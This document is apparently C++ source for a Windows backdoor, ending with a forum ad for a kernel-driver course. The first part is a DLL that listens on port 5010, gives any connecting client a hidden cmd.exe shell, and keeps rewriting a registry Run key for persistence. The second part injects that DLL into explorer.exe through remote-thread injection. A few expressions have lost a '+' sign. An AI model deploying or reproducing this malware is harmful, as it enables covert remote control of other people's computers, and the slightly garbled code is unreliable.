#include "stdafx.h"
#include "winsock2.h"
#pragma comment(lib,"ws2_32")
#define PORT 5010
#define REG_RUN "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
struct THREADPARAM
{
SOCKET sock;
HANDLE handle;
};
DWORD WINAPI ControlThread(void *no);
DWORD WINAPI BDoor(void *lp);
DWORD WINAPI RecvThread(void *lp);
DWORD WINAPI SendThread(void *lp);
DWORD WINAPI WriteReg(void *no);
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
::CreateThread(NULL,0,ControlThread,NULL,0,NULL);
break;
}
case DLL_PROCESS_DETACH:
{
break;
}
}
return TRUE;
}
DWORD WINAPI ControlThread(void *no)
{
CreateThread(NULL,0,WriteReg,NULL,0,NULL);
WSADATA wsaData;
SOCKET listenSock;
if(::WSAStartup(MAKEWORD(2,2),&wsaData)!=0)
{
return -1;
}
if((listenSock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
{
return -1;
}
sockaddr_in localAddr,inAddr;
int addrLen=sizeof(inAddr);
localAddr.sin_addr.S_un.S_addr=0;
localAddr.sin_family=AF_INET;
localAddr.sin_port=htons(PORT);
if(bind(listenSock,(sockaddr *)&localAddr,sizeof(localAddr))
==SOCKET_ERROR)
{
closesocket(listenSock);
return -1;
}
listen(listenSock,5);
while(TRUE)
{
SOCKET acceptSock=accept(listenSock,(sockaddr *)&inAddr,&addrLen);
DWORD ID;
CreateThread(NULL,0,BDoor,&acceptSock,0,&ID);
Sleep(100);
}
closesocket(listenSock);
::WSACleanup();
}
DWORD WINAPI WriteReg(void *no)
{
char sysPath[MAX_PATH]={0};
int ret=::GetSystemDirectory(sysPath,MAX_PATH);
if(sysPath[ret-1]!='\\')
strcat(sysPath,"\\");
strcat(sysPath,"DllInjection.exe");
int len=strlen(sysPath);
while(TRUE)
{
HKEY hKey;
if(::RegOpenKey(HKEY_LOCAL_MACHINE,REG_RUN,&hKey)!=ERROR_SUCCESS)
continue;
::RegSetValueEx(hKey,"sysDll",0,REG_SZ,(BYTE *)sysPath,len);
::RegCloseKey(hKey);
Sleep(5000);
}
return 0;
}
DWORD WINAPI BDoor(void *lp)
{
SOCKET sock=*((SOCKET *)lp);
HANDLE hCmdOut,hCmdIn,hRead,hWrite;
SECURITY_ATTRIBUTES sec={0};
sec.nLength=sizeof(sec);
sec.lpSecurityDescriptor=NULL;
sec.bInheritHandle=TRUE;
CreatePipe(&hCmdIn,&hWrite,&sec,0);
CreatePipe(&hRead,&hCmdOut,&sec,0);
char cmdDir[MAX_PATH]={0};
::GetSystemDirectory(cmdDir,MAX_PATH);
if(cmdDir[strlen(cmdDir)-1]!='\\')
strcat(cmdDir,"\\");
strcat(cmdDir,"cmd.exe");
STARTUPINFO startUpInfo={0};
startUpInfo.cb=sizeof(startUpInfo);
startUpInfo.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
startUpInfo.wShowWindow=SW_HIDE;
startUpInfo.hStdError=startUpInfo.hStdOutput=hCmdOut;
startUpInfo.hStdInput=hCmdIn;
PROCESS_INFORMATION processInfo={0};
int ret=CreateProcess
(cmdDir,NULL,NULL,NULL,TRUE,0,NULL,NULL,&startUpInfo,&processInfo);
if(ret==0)
{
return -1;
}
CloseHandle(hCmdIn);
CloseHandle(hCmdOut);
DWORD ID1,ID2;
HANDLE hRecvThread,hSendThread;
THREADPARAM recvParam={0},sendParam={0};
recvParam.sock=sock;
recvParam.handle=hWrite;
hRecvThread=CreateThread(NULL,0,RecvThread,&recvParam,0,&ID1);
sendParam.sock=sock;
sendParam.handle=hRead;
hSendThread=CreateThread(NULL,0,SendThread,&sendParam,0,&ID2);
ULONG code;
::WaitForSingleObject(hRecvThread,INFINITE);
::GetExitCodeThread(hSendThread,&code);
::TerminateThread(hSendThread,code);
::GetExitCodeProcess(processInfo.hProcess,&code);
::TerminateProcess(processInfo.hProcess,code);
closesocket(sock);
CloseHandle(hWrite);
CloseHandle(hRead);
return 0;
}
DWORD WINAPI RecvThread(void *lp)
{
char cmd[256]={0};
THREADPARAM param=*((THREADPARAM *)lp);
while(1)
{
char temp[2]={0};
int ret=recv(param.sock,temp,1,0);
if(ret==0)
{
break;
}
else if(ret==1)
{
send(param.sock,temp,1,0);
strcat(cmd,temp);
if(temp[0]=='\n')
{
if(_stricmp(cmd,"exit\r\n")==0)
{
break;
}
ULONG len;
::WriteFile(param.handle,cmd,strlen(cmd),&len,NULL);
memset(cmd,0,256);
}
}
}
return 0;
}
DWORD WINAPI SendThread(void *lp)
{
THREADPARAM param=*((THREADPARAM *)lp);
char buf[1024]={0};
while(1)
{
ULONG len=0;
::PeekNamedPipe(param.handle,buf,1024,&len,NULL,NULL);
if(len>0)
{
::ReadFile(param.handle,buf,1024,&len,NULL);
send(param.sock,buf,len,0);
memset(buf,0,1024);
}
Sleep(100);
}
return 0;
}
// Dll.cpp
#include "stdafx.h"
#include "windows.h"
#include "stdlib.h"
#include "tlhelp32.h"
#include "io.h"
long GetProcessID(char *processName);
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
Sleep(5000);
long ID=GetProcessID("explorer");
if(ID==-1)
return -1;
HINSTANCE hDll;
HINSTANCE (* pProc)(LPCTSTR);
DWORD (WINAPI * pThreadProc)(void *);
if((hDll=::LoadLibrary("kernel32.dll"))==NULL)
return -1;
if((pProc=(HINSTANCE (*)(LPCTSTR))::GetProcAddress(hDll,"LoadLibraryA"))
==NULL)
return -1;
pThreadProc=(DWORD (WINAPI *)(void *))pProc;
HANDLE hProcess=::OpenProcess(PROCESS_ALL_ACCESS,TRUE,ID);
if(hProcess==NULL)
return -1;
char pDllPath[MAX_PATH]={0};
char *pRemoteAddr=NULL;
int ret=::GetSystemDirectory(pDllPath,MAX_PATH);
if(pDllPath[ret-1]!='\\')
strcat(pDllPath,"\\");
strcat(pDllPath,"BDoor.dll");
if(::_access(pDllPath,0)==-1)
return -1;
pRemoteAddr=(char*)::VirtualAllocEx(hProcess,NULL,strlen(pDllPath)
1,MEM_COMMIT,PAGE_READWRITE);
if(pRemoteAddr==NULL)
return -1;
ret=::WriteProcessMemory(hProcess,pRemoteAddr,pDllPath,strlen
(pDllPath),NULL);
if(ret==0)
return -1;
HANDLE hRemoteThread=::CreateRemoteThread
(hProcess,NULL,0,pThreadProc,pRemoteAddr,0,NULL);
Sleep(100);
::VirtualFreeEx(hProcess,pRemoteAddr,strlen(pDllPath) 1,MEM_DECOMMIT);
::CloseHandle(hProcess);
return 0;
}
long GetProcessID(char *processName)
{
HANDLE hSnapshot;
PROCESSENTRY32 pe32={0};
BOOL fRet;
hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(hSnapshot==NULL)
return -1;
pe32.dwSize=sizeof(PROCESSENTRY32);
fRet=Process32First(hSnapshot,&pe32);
if(!fRet)
return -1;
int g=0;
char drive[_MAX_DRIVE]={0};
char dir[_MAX_DIR]={0};
char fname[_MAX_FNAME]={0};
char ext[_MAX_EXT]={0};
do
{
_splitpath(pe32.szExeFile,drive,dir,fname,ext);
if(_stricmp(processName,fname)==0)
{
g=1;
break;
}
}while(Process32Next(hSnapshot,&pe32));
if(g!=1)
return -1;
return pe32.th32ProcessID;
}
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课